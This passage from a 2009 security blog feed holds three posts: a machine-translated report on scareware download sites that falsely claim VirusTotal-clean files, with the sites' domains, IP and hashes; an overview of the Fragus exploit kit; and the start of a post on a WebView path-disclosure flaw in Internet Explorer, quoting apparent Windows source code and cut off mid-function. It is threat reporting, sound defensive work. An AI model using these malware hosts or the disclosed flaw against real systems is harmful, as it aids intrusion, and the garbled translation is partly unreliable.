los desarrolladores de códigos maliciosos para intentar atraer la confianza de los usuarios y aprovecharse así de esa condición para ejecutar el proceso de infección."&gt;Transferred this concept to the computer field, is neither more nor less than a &lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/01/deception-techniques-that-do-not-go-out.html"&gt;social engineering&lt;/a&gt; methodology that increasingly used by developers of malicious code to try to attract the confidence of users and thus take advantage of this condition to execute the process of infection.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Trasladado este concepto al ámbito informático, no es ni más ni menos que una metodología de Ingeniería Social que cada vez más utilizan los desarrolladores de códigos maliciosos para intentar atraer la confianza de los usuarios y aprovecharse así de esa condición para ejecutar el proceso de infección."&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Sxp9pegoPcI/AAAAAAAAB_4/3ga5i6Tz5wc/s1600-h/mipistus-malware-catcher.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 173px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Sxp9pegoPcI/AAAAAAAAB_4/3ga5i6Tz5wc/s200/mipistus-malware-catcher.png" alt="" id="BLOGGER_PHOTO_ID_5411776053757099458" border="0" /&gt;&lt;/a&gt;&lt;span style="color: rgb(0, 0, 0);" id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Habitualmente lo vemos en las páginas que diseminan malware del tipo scareware (también conocido como rogue), donde encontramos imágenes de certificaciones como Virus Bulletin o AV-Comparatives, o algunas otras como PC Magazine o PC World que si bien no cumplen la misma función que"&gt;Usually we see on the pages &lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/11/recent-tour-of-scareware-xviii.html"&gt;scareware&lt;/a&gt; rate spread malware (also known as &lt;span style="font-weight: bold;"&gt;rogue&lt;/span&gt;), where we find pictures of certifications such as &lt;a style="color: rgb(51, 51, 255);" href="http://www.virusbtn.com/index"&gt;Virus Bulletin&lt;/a&gt; and &lt;a style="color: rgb(51, 51, 255);" href="http://www.av-comparatives.org/"&gt;AV-Comparatives&lt;/a&gt;, or some other like &lt;a style="color: rgb(51, 51, 255);" href="http://www.pcmag.com/"&gt;PC Magazine&lt;/a&gt; or &lt;a style="color: rgb(51, 51, 255);" href="http://www.pcworld.com/"&gt;PC World&lt;/a&gt; that don't fulfill the same function as &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="las anteriormente ya que son revistas conocidas que gozan de &amp;quot;confianza&amp;quot; entre el público."&gt;the magazine formerly known as they are enjoying "trust" among the public.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Otra alternativa centra sus esfuerzos en tratar de demostrar que esa &amp;quot;solución&amp;quot; (scareware) es la mejor."&gt;Another alternative is focusing its efforts on trying to prove that this "solution" (scareware) is the best. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Esto se hace a través de falsas comparativas donde se pone en tela de juicio los niveles de detección de compañías antivirus ampliamente conocidas en el mercado."&gt;This is done through f&lt;span style="font-weight: bold;"&gt;alse compare&lt;/span&gt; where it gets questioned the detection levels of antivirus companies widely known in the market.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span title="Ambas estrategias de engaño apelan a lo que se conoce bajo el concepto de autoridad que representan estas certificaciones y publicaciones en el campo &amp;quot;real&amp;quot; de la seguridad antivirus y de la tecnología informática respectivamente."&gt;Both strategies of deception appeal to what is known under the concept of &lt;span style="font-weight: bold;"&gt;authority&lt;/span&gt; represented by these certificates and publications in the "real" antivirus and information technology respectively.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span title="Ambas estrategias de engaño apelan a lo que se conoce bajo el concepto de autoridad que representan estas certificaciones y publicaciones en el campo &amp;quot;real&amp;quot; de la seguridad antivirus y de la tecnología informática respectivamente."&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span title="En este sentido, recientemente he detectado otra metodología de engaño que también se encuentra orientada a emitir desinformación con el objetivo de incentivar a los usuarios a creer en la información y actuar en consecuencia."&gt;In this regard, I recently discovered another method of deception is also directed to issue disinformation with the aim of encouraging users to believe the information and act accordingly.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span title="En este sentido, recientemente he detectado otra metodología de engaño que también se encuentra orientada a emitir desinformación con el objetivo de incentivar a los usuarios a creer en la información y actuar en consecuencia."&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span title="Se trata de simular que el archivo ofrecido se encuentra libre de códigos maliciosos, apelando también a la autoridad, pero en este caso, de organizaciones que permiten verificar la integridad de los archivos a través de un proceso online que somete los archivos a las soluciones antivirus"&gt;It's pretending that the file is provided free of malicious code, also appealing to authority, but in this case, enabling organizations to verify the integrity of files through an online process to submit the files to antivirus solutions &lt;/span&gt;&lt;span title="con mayor confianza en el mercado."&gt;with greater confidence in the market. &lt;/span&gt;&lt;span title="Por ejemplo, servicios como VirusTotal o VirScan."&gt;For example, services such as &lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/"&gt;VirusTotal&lt;/a&gt; or &lt;a style="color: rgb(51, 51, 255);" href="http://virscan.org/"&gt;VirScan&lt;/a&gt;. &lt;/span&gt;&lt;span title="A continuación vemos una de las capturas."&gt;We then see a catch.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Sxp-sMtae_I/AAAAAAAACAA/F5HookHH8gc/s1600-h/mipistus-fake-malware.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 321px; height: 400px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Sxp-sMtae_I/AAAAAAAACAA/F5HookHH8gc/s400/mipistus-fake-malware.png" alt="" id="BLOGGER_PHOTO_ID_5411777200030120946" border="0" /&gt;&lt;/a&gt;&lt;span id="result_box" class="medium_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Los dominios involucrados se encuentran alojados en la IP 213.5.64.20, ubicada en los Países Bajos (Netherlands Altushost Inc) en pero no todos diseminan la amenaza."&gt;The domains involved are housed in the IP &lt;span style="font-weight: bold;"&gt;213.5.64.20&lt;/span&gt;, located in the Netherlands (&lt;span style="font-style: italic;"&gt;Netherlands Altushost Inc&lt;/span&gt;) but not all spread the threat. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Entre ellos:"&gt;Among them:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt; &lt;/div&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;safehostingsolutions.com/download.html&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;fileaddiction.com/download.html&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;freedatatransfer.com/download.html&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;freedownloadthanks.com/download.html&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;megasecuredownload.com/download.html&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;qualityupload.com/download.html&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span id="result_box" class="short_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Los archivos que se descargan tienen los siguientes nombres:"&gt;The files that are downloaded are the following names:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Hpack Generator.exe &lt;/span&gt;&lt;span style="font-size:85%;"&gt;(91b31ea8c551397cd5b1d38ec1aa98dd)&lt;/span&gt; - Result: &lt;a style="color: rgb(51, 51, 255); font-weight: bold;" href="http://www.virustotal.com/analisis/7a1ac8b5352f70f06b011f07723828e73e958c7deb5590e7ae22796e9dfb285d-1259982983"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;8&lt;/span&gt;/40 (20.00%)&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;UAV Generator.exe&lt;/span&gt; – Idem&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Knight Generator.exe&lt;/span&gt;&lt;span style="font-style: italic;"&gt; &lt;/span&gt;– Idem&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;LG Generator.exe&lt;/span&gt; – Idem&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Kings Generator.exe&lt;/span&gt; – Idem&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;DBlocks Generator.exe&lt;/span&gt; –&lt;span style="font-size:85%;"&gt; (53e3256bef0352caf794b641f93a32d5)&lt;/span&gt; - Result: &lt;a style="font-weight: bold; color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/7728aab19997bb2aab25393d7a1d0dd89caa2d767511d56a6a79d19fb5862282-1259988751"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;6&lt;/span&gt;/40 (15%)&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Como podemos notar, que además de la nueva propuesta de engaño que a pesar de ser bastante trivial cuenta con un alto impacto de efectividad, el nivel de detección en los dos códigos maliciosos es muy bajo; representando sólo entre el 15% y 25% de"&gt;As can be seen that besides the new proposal for cheating despite being quite trivial has a high impact on effectiveness, the level of detection in the two malicious codes is very low, representing only 15% and 25% of &lt;/span&gt;&lt;span title="41 motores antivirus."&gt;41 antivirus engines.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span title="41 motores antivirus."&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="No es para alarmarse pero sí para estar atentos."&gt;It isn't to panic but to be vigilant.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255); font-weight: bold;" title="Información relacionada"&gt;Related information&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/11/recent-tour-of-scareware-xviii.html"&gt;A recent tour of scareware XVIII&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/inteligencia-informatica-seguridad-de.html"&gt;Inteligencia informática, Seguridad de la Información y Ciber-Guerra&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/01/deception-techniques-that-do-not-go-out.html"&gt;Deception techniques that do not go out of style&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;br /&gt;Pistus Malware Intelligence&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-2843903599536161921?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/2843903599536161921/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=2843903599536161921' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2843903599536161921'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2843903599536161921'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/12/disinformation-campaign-to-spread.html' title='Disinformation campaign to spread malware'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Ppq0fEGkHo4/Sxp9pegoPcI/AAAAAAAAB_4/3ga5i6Tz5wc/s72-c/mipistus-malware-catcher.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-8273337623510231204</id><published>2009-12-04T15:20:00.001-11:00</published><updated>2009-12-04T15:20:58.677-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='Crimeware'/><category scheme='http://www.blogger.com/atom/ns#' term='fragus'/><category scheme='http://www.blogger.com/atom/ns#' term='botnet'/><title type='text'>A brief glance inside Fragus</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Fragus es una de las aplicaciones web desarrolladas para la gestión de zombis, de origen ruso, que con poco tiempo de vida se ha insertado al mercado clandestino de crimeware con un precio accesible (USD 800) si tenemos en cuenta las capacidades delictivas que ofrece."&gt;&lt;span style="font-weight: bold;"&gt;Fragus&lt;/span&gt; is a web application developed for the management of zombies, of Russian origin, who long to live has been inserted &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/los-precios-del-crimeware-ruso-parte-2.html"&gt;&lt;span style="font-weight: bold;"&gt;crimeware &lt;/span&gt;clandestine market&lt;/a&gt; with an affordable price (&lt;span style="font-weight: bold;"&gt;USD 800&lt;/span&gt;) if we consider criminal capabilities it offers.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Este crimeware se compone básicamente de cinco secciones: Statistics, Files, Sellers, Traffic links y Preferences."&gt;The crimeware is basically composed of five sections: &lt;span style="font-style: italic;"&gt;Statistics, Files, Sellers, Traffic links and Preferences&lt;/span&gt;. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Cada una de ellas se encarga de una tarea específica y todas se complementan entre ellas."&gt;Each handles a specific task and they all complement one another.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="En el panel Files se encuentra la manipulación del archivo ejecutable que será diseminado."&gt;In the &lt;span style="font-style: italic;"&gt;Files&lt;/span&gt; panel is handling the executable file that will spread.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SxcqfYHNxDI/AAAAAAAAB_Q/7vzgO4yhBOA/s1600-h/mipistus-fragus-files.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SxcqfYHNxDI/AAAAAAAAB_Q/7vzgO4yhBOA/s400/mipistus-fragus-files.png" alt="" id="BLOGGER_PHOTO_ID_5410840195845964850" border="0" /&gt;&lt;/a&gt;&lt;span id="result_box" class="short_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="En Sellers encontramos la gestión de exploits."&gt;&lt;span style="font-weight: bold;"&gt;Sellers&lt;/span&gt; are in management exploits. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="En este caso, correspondiente a la primera versión de Fragus."&gt;In this case, corresponding to the first version of &lt;span style="font-weight: bold;"&gt;Fragus&lt;/span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SxcqndYPY3I/AAAAAAAAB_Y/2EpXCbalB0M/s1600-h/mipistus-sellers.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SxcqndYPY3I/AAAAAAAAB_Y/2EpXCbalB0M/s400/mipistus-sellers.png" alt="" id="BLOGGER_PHOTO_ID_5410840334698505074" border="0" /&gt;&lt;/a&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="En cuanto al módulo Traffic links, permite realizar la &amp;quot;previa&amp;quot; configurando el iframeado y el script que será inyectado en la página que oficiará de &amp;quot;conductor&amp;quot; para la ejecución de los exploits configurador en el panel previo, que buscaran vulnerabilidades en el equipo víctima"&gt;Regarding the &lt;span style="font-weight: bold;"&gt;Traffic links&lt;/span&gt; module, allows the "previous" and setting the&lt;span style="font-weight: bold;"&gt; iframe script&lt;/span&gt; that will be injected into the page that shall act as "driver" for the implementation of the configurator exploits the previous panel, that look for vulnerabilities on the victim machine &lt;/span&gt;&lt;span title="."&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Sxcqw3umplI/AAAAAAAAB_g/jcRFhqFN0CA/s1600-h/mipistus-fragus-traffic.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Sxcqw3umplI/AAAAAAAAB_g/jcRFhqFN0CA/s400/mipistus-fragus-traffic.png" alt="" id="BLOGGER_PHOTO_ID_5410840496390448722" border="0" /&gt;&lt;/a&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Sin embargo, uno de los patrones que se identifican en cada uno de los paquetes de este estilo, es el módulo estadístico."&gt;However, one of the patterns identified in each of the packages of this style is the &lt;span style="font-weight: bold;"&gt;Statistical&lt;/span&gt; module. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Este módulo proporciona la información de inteligencia necesaria para que el botmaster obtenga un reporte detallado no solo de los equipos zombis sino también de ciertos aspectos necesarios para conocer en detalle qué exploit deberá ejecutar."&gt;This module provides the &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/inteligencia-informatica-seguridad-de.html"&gt;intelligence&lt;/a&gt; necessary for the botmaster get a detailed report of the teams not only zombies but also on certain aspects needed to know in detail what should exploit to run.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Sxcq9q-aMOI/AAAAAAAAB_o/8I9zBe3_KxE/s1600-h/mipistus-fragus-static.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 319px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Sxcq9q-aMOI/AAAAAAAAB_o/8I9zBe3_KxE/s400/mipistus-fragus-static.png" alt="" id="BLOGGER_PHOTO_ID_5410840716305379554" border="0" /&gt;&lt;/a&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Otro de los patrones interesantes que podemos deducir en función de esta información es que el sistema operativo más explotado es Windows XP con Internet Explorer, que el exploit con mayor eficacia, a pesar de ser muy antiguo (MS06-014) es el que aprovecha la"&gt;Another interesting patterns we can deduce on the basis of this information is that the operating system is exploited Windows XP with Internet Explorer, the exploit more effectively, despite being very old (&lt;a style="color: rgb(51, 51, 255);" href="http://www.microsoft.com/technet/security/Bulletin/ms06-014.mspx"&gt;MS06-014&lt;/a&gt;) is the one that takes the &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="vulnerabilidad en MDAC y que entre los países con mayor tasa de infección son EEUU y Korea."&gt;vulnerability in &lt;span style="font-weight: bold;"&gt;MDAC&lt;/span&gt; and that among the countries with the highest rates of infection are the USA and Korea.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Este representa un escenario común donde quizás, el factor de relevancia, es la deducción de que tal vez lo común de la situación se debe al importante volumen de usuario que utiliza el sistema operativo de Microsoft de forma no licenciada, lo cual conlleva a no actualizarlo"&gt;This represents a common scenario where perhaps the relevance factor is the inference that perhaps common situation due to the large volume of user who uses the Microsoft operating system on a non-licensed, which leads to not update &lt;/span&gt;&lt;span title="."&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Por último, otro importante factor que no debe pasar desapercibido es que a los ciber-delincuentes no les interesa la controversia que existe en torno a los niveles de seguridad que ofrece uno u otro sistema operativo (Windows, GNU/Linux y Mac OS) sino"&gt;Finally, another important factor that must not be overlooked is that cyber-criminals are not interested in the controversy surrounding the safety levels offered by one or another operating system (Windows, GNU/Linux and Mac OS) but &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="que todos entran en la mismo categoría de &amp;quot;potenciales víctimas&amp;quot; porque la vulnerabilidad explota en capa 7."&gt;all fall into the same category of "potential victims" because the vulnerability exploited in layer 7.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255); font-weight: bold;" title="Información relacionada"&gt;Related information&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/fragus-nueva-botnet-framework-in-wild.html"&gt;Fragus. Nueva botnet framework In-the-Wild&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/11/justexploit-nuevo-exploit-kit-que.html"&gt;&lt;span&gt;JustExploit. Nuevo Exploit Kit que explota Java&lt;/span&gt;&lt;/a&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-size:85%;"&gt;&lt;span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/11/ddos-botnet-nuevo-crimeware-de.html"&gt;DDoS Botnet. Nuevo crimeware de propósito particular&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/11/t-iframer-kit-para-la-inyeccion-de.html"&gt;T-IFRAMER. Kit para la inyección de malware In-the-Wild&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/11/zopack-nueva-alternativa-para-la.html"&gt;ZoPAck. Nueva alternativa para la explotación de vulnerabilidades&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/zeus-botnet-y-su-poder-de-reclutamiento.html"&gt;ZeuS Botnet y su poder de reclutamiento zombi&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/eleonore-exploits-pack-nueva-crimeware.html"&gt;Eleonore Exploits Pack. Nuevo crimeware In-the-Wild&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/liberty-exploit-system-otra-alternativa.html"&gt;Liberty Exploit System. Otra alternativa (...) para el control de botnets&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;br /&gt;Pistus Malware Intelligence&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-8273337623510231204?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/8273337623510231204/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=8273337623510231204' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8273337623510231204'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8273337623510231204'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/12/brief-glance-inside-fragus.html' title='A brief glance inside Fragus'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Ppq0fEGkHo4/SxcqfYHNxDI/AAAAAAAAB_Q/7vzgO4yhBOA/s72-c/mipistus-fragus-files.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-5687983582489722670</id><published>2009-12-03T20:51:00.002-11:00</published><updated>2009-12-04T11:08:51.138-11:00</updated><title type='text'>Exploiting WebView through Internet Explorer to remotely discover windows directory</title><content type='html'>As for any large product, Microsoft Windows operating system is built on its previous versions code. Some of this code even goes back until Microsoft Windows 98.&lt;br /&gt;&lt;br /&gt;In Windows 98 a new look was introduced called "WebView" which included the way folders are displayed and the way the desktop is displayed are all HTML templates which were also editable to the default administrative user.You can read more about it here:http://msdn.microsoft.com/en-s/library/bb776835(VS.85).aspx&lt;br /&gt;&lt;br /&gt;Those HTML Templates had the extension "htt". In order for the folder templates to function properly and being able to display the current folder, a few automatically expended variables were added to the module filtering the "htt" files. These are:&lt;br /&gt;%TEMPLATEDIR% (hardcoded)&lt;br /&gt;%THISDIRPATH% (hardcoded)&lt;br /&gt;%THISDIRNAME% (hardcoded)&lt;br /&gt;%BACKGROUNDIMAGE% (registry)&lt;br /&gt;%LOGOLINE% (registry)&lt;br /&gt;&lt;br /&gt;This mechanism lives until today deeply inside Windows XP's code in two modules inside the system32 folder:&lt;br /&gt;1) Webvw.dll&lt;br /&gt;2) Mshtml.dll&lt;br /&gt;&lt;br /&gt;Webvw.dll is the module which is responsible for all the Webview installation and normal activity and mshtml.dll is the main module for HTML Filtering &amp; Rendering used Windows Explorer and Internet Explorer.&lt;br /&gt;&lt;br /&gt;When Microsoft Windows is installed and webvw.dll is registered, it adds it CLSID and a few registry keys. The interesting ones are these:&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\BACKGROUNDIMAGE&lt;br /&gt;Default = "%SystemRoot%\Web\wvleft.bmp"&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\LOGOLINE&lt;br /&gt;Default = "%SystemRoot%\Web\wvline.gif"&lt;br /&gt;&lt;br /&gt;Every time an htt file is rendered, without any local-remote or any zone consideration, those variables are replaced with the current system's path.&lt;br /&gt;This is the code inside mimeflt.cpp which contains the bug:Lines 360 to 433:&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;#define REG_WEBVIEW_TEMPLATE_MACROS&lt;br /&gt;TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WebView\\TemplateMacros")&lt;br /&gt;&lt;br /&gt;void ConvertBytesToTChar(LPCBYTE pBuf, UINT nCharSize, LPTSTR psz, int cch) {&lt;br /&gt; if (SIZEOF(char) == nCharSize) {&lt;br /&gt;  SHAnsiToTChar((LPCSTR)pBuf, psz, cch);&lt;br /&gt; } else {&lt;br /&gt;  ASSERT(nCharSize == SIZEOF(WCHAR));&lt;br /&gt;  SHUnicodeToTChar((LPCWSTR)pBuf, psz, cch);&lt;br /&gt; }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void ExpandMacro(LPBYTE pszMacro, LPBYTE pszExpansion, int nBytes, UINT nCharSize) {&lt;br /&gt; TCHAR szExpansion[MAX_PATH];&lt;br /&gt; szExpansion[0] = TEXT('\0');&lt;br /&gt; TCHAR szTCharMacro[MAX_PATH];&lt;br /&gt;&lt;br /&gt; ConvertBytesToTChar(pszMacro, nCharSize, szTCharMacro, ARRAYSIZE(szTCharMacro));&lt;br /&gt; TCHAR szKey[MAX_PATH];&lt;br /&gt; lstrcpyn(szKey, REG_WEBVIEW_TEMPLATE_MACROS, ARRAYSIZE(szKey));&lt;br /&gt; StrCatBuff(szKey, TEXT("\\"), ARRAYSIZE(szKey));&lt;br /&gt; StrCatBuff(szKey, szTCharMacro, 